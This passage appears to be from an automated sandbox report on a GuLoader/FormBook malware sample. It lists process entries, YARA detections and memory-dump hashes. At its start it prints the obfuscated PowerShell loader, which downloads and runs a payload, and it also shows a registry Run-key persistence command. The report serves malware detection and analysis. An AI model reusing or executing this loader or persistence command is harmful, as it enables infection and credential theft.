HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta.. LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$ DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs( Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne (Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne (Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende 'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden 
+Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne (Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne (Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,. ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne $Binres;"
                          Imagebase:0x530000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.2230990264.0000000008710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.2197404574.0000000005936000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2231302976.000000000AFC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:09:51:45
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
                          Imagebase:0x240000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:15
                          Start time:09:52:04
                          Start date:04/05/2024
                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                          Imagebase:0xf80000
                          File size:516'608 bytes
                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.2467703895.0000000004F10000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:true

                          Target ID:16
                          Start time:09:52:11
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
                          Imagebase:0x240000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:17
                          Start time:09:52:11
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:18
                          Start time:09:52:11
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\reg.exe
                          Wow64 process (32bit):true
                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
                          Imagebase:0xd0000
                          File size:59'392 bytes
                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:19
                          Start time:09:52:32
                          Start date:04/05/2024
                          Path:C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe"
                          Imagebase:0x4b0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Has exited:false

                          Target ID:20
                          Start time:09:52:38
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\clip.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\clip.exe"
                          Imagebase:0xf70000
                          File size:24'576 bytes
                          MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Has exited:false

                          Target ID:22
                          Start time:09:52:53
                          Start date:04/05/2024
                          Path:C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe"
                          Imagebase:0x4b0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Has exited:true

                          Target ID:25
                          Start time:09:52:55
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480
                          Imagebase:0xf80000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a8cd752ebc94d962a2d266ed9cf160d9779caeee43953cafb00e586dfca5f7af
                            • Instruction ID: a2d5155ee652ff3ac0a5a037a8c158cedcc50669dbc3a95dc5952c93c6c5830c
                            • Opcode Fuzzy Hash: a8cd752ebc94d962a2d266ed9cf160d9779caeee43953cafb00e586dfca5f7af
                            • Instruction Fuzzy Hash: 1F91BD34A012449FCB14DFA9D884AAEBBF2FF89314F1585A9E4059B361DB35EC86CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 434c35281d974e119ca21a2825d23603063dbf49586bccee67ff9ee1d7b7867d
                            • Instruction ID: 1e95ad06e43738fcd6cdbb98144efe613e1c35597726fb4be7602b380edc53c9
                            • Opcode Fuzzy Hash: 434c35281d974e119ca21a2825d23603063dbf49586bccee67ff9ee1d7b7867d
                            • Instruction Fuzzy Hash: A891AB74A006458FCB05CF99C4949BAFBB1FF88310B248599E455AB3A6C735FC50CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 846faca4878dbb0ca2051a7b1d94d06a0571ec55100ad6e919a45d5657cd0304
                            • Instruction ID: 2de865910488931df3426a017fee974db74b661313a94afb6fac656a43fbf9a0
                            • Opcode Fuzzy Hash: 846faca4878dbb0ca2051a7b1d94d06a0571ec55100ad6e919a45d5657cd0304
                            • Instruction Fuzzy Hash: F6712834E00208DFDB14EFA5D484BADBBF2BF88304F158529D416AB760DB75AD8ACB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a8f6ceab978b3a5a2df41d56b413d51070d5805e76268db61608bf85196ae5a6
                            • Instruction ID: 1f8dd16f276ce1cf29b4f172331fd9d3bc6d8d2867b0440cc4162d75a55b9de2
                            • Opcode Fuzzy Hash: a8f6ceab978b3a5a2df41d56b413d51070d5805e76268db61608bf85196ae5a6
                            • Instruction Fuzzy Hash: 47612E34A002498FCB15DFA4D584AADBBB2FF85340F158555E402AF369DB78ED89CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5bdbec6f692f31e694196fc16122230e5524c2e45f8e0aed9278da5545207134
                            • Instruction ID: 313e70c1e6199b0fe3f8e4fbbbd48bc534370d5ac7023660d273fe760cc4481b
                            • Opcode Fuzzy Hash: 5bdbec6f692f31e694196fc16122230e5524c2e45f8e0aed9278da5545207134
                            • Instruction Fuzzy Hash: B6610C34A00649DFDB15DFA4C584AADBBB2FF85300F158554E402AF369DB78ED89CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c80dd0282c1aef2945e200ad37cf9b9aea55c6f31acba2b6357cac0208560c3c
                            • Instruction ID: 1765c3e5e30e612c729f1aabcbd9fc6bc4a68a56511c76d56e29a3d3d26e8048
                            • Opcode Fuzzy Hash: c80dd0282c1aef2945e200ad37cf9b9aea55c6f31acba2b6357cac0208560c3c
                            • Instruction Fuzzy Hash: C7516B75A00208DFCB14DFA8C884AADBBF2FF88354F158469D4169B765EB35AC46CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bdb0f6400811a1399059f7fdd8b2220edfb114549dd9c44eae48ecda0278c19
                            • Instruction ID: de6e4b7bf5270074b8900eed78fa5e4207e70512a28b69d19063fa21d93e5318
                            • Opcode Fuzzy Hash: 6bdb0f6400811a1399059f7fdd8b2220edfb114549dd9c44eae48ecda0278c19
                            • Instruction Fuzzy Hash: 0A414A35B00200DFDB14DB75C998AB9BBB6EF89355F149468E406EB3A0EB35EC41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a271b3edb2fcc70f74a8f4ca917e87bece6e0e1eccce4760f2f973d145b352c8
                            • Instruction ID: 09dd9f1d8bb1f5f269f41f858c4e78068bdb6a85703f5ce06b1227c83f7ba532
                            • Opcode Fuzzy Hash: a271b3edb2fcc70f74a8f4ca917e87bece6e0e1eccce4760f2f973d145b352c8
                            • Instruction Fuzzy Hash: 96414AB4A001059FCB05CF99C1949BAFBB1FF88350B158599E4119B366C735FC50CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 41a5efbbf6fbb554981a1e596cf11bab575755a454adc9efc230f40b16a7f41a
                            • Instruction ID: 41a102853f3f03479d9cbb2a8566b32825f93d9d7b324ffbf4b0216f77d0ba8c
                            • Opcode Fuzzy Hash: 41a5efbbf6fbb554981a1e596cf11bab575755a454adc9efc230f40b16a7f41a
                            • Instruction Fuzzy Hash: 61312235A042488FC701EF69E4809AEBFF2EF89350B4141A9D4059F326DB30E98587E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141084654.000000000463D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0463D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_463d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d24f7baa79b6823a5d87e0fcd0a4dac20ee6872630edd0de3a1a5404692d0a85
                            • Instruction ID: 55d101f2260b355f45b09fcea640061f650d681d47af55385006d81019076ece
                            • Opcode Fuzzy Hash: d24f7baa79b6823a5d87e0fcd0a4dac20ee6872630edd0de3a1a5404692d0a85
                            • Instruction Fuzzy Hash: ACF02839300304DFCB12AB65D554AA6BBF4EBCA365B0640AFD448CB712C776D846C792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 66440c18b917e2dd5593c287b11073015a0100675ddb14dc432e1cc5fccd9a52
                            • Instruction ID: 08928f5a30f4424c5d3d366b03532b663c1b63f60e716414d8bb5d67ed2a55a1
                            • Opcode Fuzzy Hash: 66440c18b917e2dd5593c287b11073015a0100675ddb14dc432e1cc5fccd9a52
                            • Instruction Fuzzy Hash: 66F0F6392043048FC7269B56D454AA2BFE8EFC6355B0A409AE1088F752C732F885C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64c6041afd958138ea9eb9df910e0e4d6212003405dc54d1830b16b5bb07c1f3
                            • Instruction ID: e4664c42906730c87525eea0b0321c23606b4e0bd324d8653d87f597aac8df8f
                            • Opcode Fuzzy Hash: 64c6041afd958138ea9eb9df910e0e4d6212003405dc54d1830b16b5bb07c1f3
                            • Instruction Fuzzy Hash: DBF0AF392047448FCB16EB55D554AA1BBE4EBC63A6B1A44DAD0088F253D732E846CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141084654.000000000463D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0463D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_463d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8b96011a1407e7898f3912ed556e432ca39799eecec1a4b65142738c31076525
                            • Instruction ID: f83123b82890157665dec1b89fcc3dc0fca6205b2f9fc6a8ff7571edfe2bbe02
                            • Opcode Fuzzy Hash: 8b96011a1407e7898f3912ed556e432ca39799eecec1a4b65142738c31076525
                            • Instruction Fuzzy Hash: FDF0C272004380AEE7108F16D884B62FFA8EB55735F18C45AED480E286D379A841CAB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: de37187e887ed087ed81a0c9c38d449d58cf2c1ea8fbf94cdc8b26abad5028eb
                            • Instruction ID: 366e3c60f8b017011812338645b2aeff8148d11732d20846c803e10881613a97
                            • Opcode Fuzzy Hash: de37187e887ed087ed81a0c9c38d449d58cf2c1ea8fbf94cdc8b26abad5028eb
                            • Instruction Fuzzy Hash: 3BF09774E0020A8FC780DF68D485AAEBBF0BF49214F5041A9D509EB321E730A955CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141258707.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_4740000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bbe8b9fa7da0c03fa5f608cf26de34d25240263c31d96d56b1be69841aefd91
                            • Instruction ID: bd1341cc4cea09a8194fcf4d818fa6b30bdf7775b162b8f135c835a2672627e2
                            • Opcode Fuzzy Hash: 2bbe8b9fa7da0c03fa5f608cf26de34d25240263c31d96d56b1be69841aefd91
                            • Instruction Fuzzy Hash: 99E022313443001FD300E728E680AEABBA2DBC5300B004169E101CB758CF75FC828BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2141084654.000000000463D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0463D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_463d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57b5997370da5f4ae1886100c5c6a43050091157843533859e8d18833a1f625f
                            • Instruction ID: 49693373d3619e1f5a2afd74a06d5a1832bc58ddfc056769228fdaf005d7837c
                            • Opcode Fuzzy Hash: 57b5997370da5f4ae1886100c5c6a43050091157843533859e8d18833a1f625f
                            • Instruction Fuzzy Hash: B4210872500280DFDF05DF14D9C4B2ABFA5FB88315F24C569EA090B315D33AE456DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$84|l$84|l$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-2050030284
                            • Opcode ID: ce3bfcd432dc54157a540958c3db4e033ca177ec7d636025674aac4ef6d68285
                            • Instruction ID: 9fdbc0340977d7848b5851a3ba1ff262818ae13d982e217805d33c7ae9d3eb9f
                            • Opcode Fuzzy Hash: ce3bfcd432dc54157a540958c3db4e033ca177ec7d636025674aac4ef6d68285
                            • Instruction Fuzzy Hash: 2B0206F1B0020ADFCB298E39D4446AABBA2EF86311F14C46ADC5A8F355DB31CD85D791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$84|l$84|l$84|l$84|l$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                            • API String ID: 0-3507498318
                            • Opcode ID: 31b6f468a4937687843a7e42bebe52d1f5b02c2d81d5ca5615d09a59d1b97ef5
                            • Instruction ID: 820b1af3c11710d8303b2023f53f687f00d9521a883f7c9b3abc30f55b4319f6
                            • Opcode Fuzzy Hash: 31b6f468a4937687843a7e42bebe52d1f5b02c2d81d5ca5615d09a59d1b97ef5
